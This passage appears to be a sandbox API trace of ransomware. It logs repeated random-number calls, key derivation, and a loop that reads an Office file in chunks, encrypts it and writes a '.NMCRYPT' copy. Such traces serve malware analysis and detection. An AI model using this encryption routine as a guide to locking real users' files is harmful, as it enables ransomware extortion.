pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.269] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0172.270] CryptHashData (hHash=0x9ad738, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.270] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad578) returned 1 [0172.270] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0172.270] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0172.270] wcslen (_String="\\\\?\\") returned 0x4 [0172.270] CryptDuplicateKey (in: hKey=0x9ad578, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7eb34 | out: phKey=0x2d7eb34*=0x9ad1f8) returned 1 [0172.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0172.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0172.272] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7eb24 | out: lpFileSize=0x2d7eb24*=36336) returned 1 [0172.272] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7eb1c*=0x200, lpOverlapped=0x0) returned 1 [0172.273] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.345] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.345] GetLastError () returned 0x0 [0172.345] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.405] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.405] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.405] GetLastError () returned 0x0 [0172.405] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.405] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.405] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.405] GetLastError () returned 0x0 [0172.405] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.405] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.405] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.405] GetLastError () returned 0x0 [0172.405] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.405] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.405] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.406] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.406] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.406] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.406] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.406] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.406] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.406] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.406] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.406] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.406] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.406] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.406] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.407] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.407] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.407] GetLastError () returned 0x0 [0172.407] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.407] ReadFile (in: hFile=0x15b0, 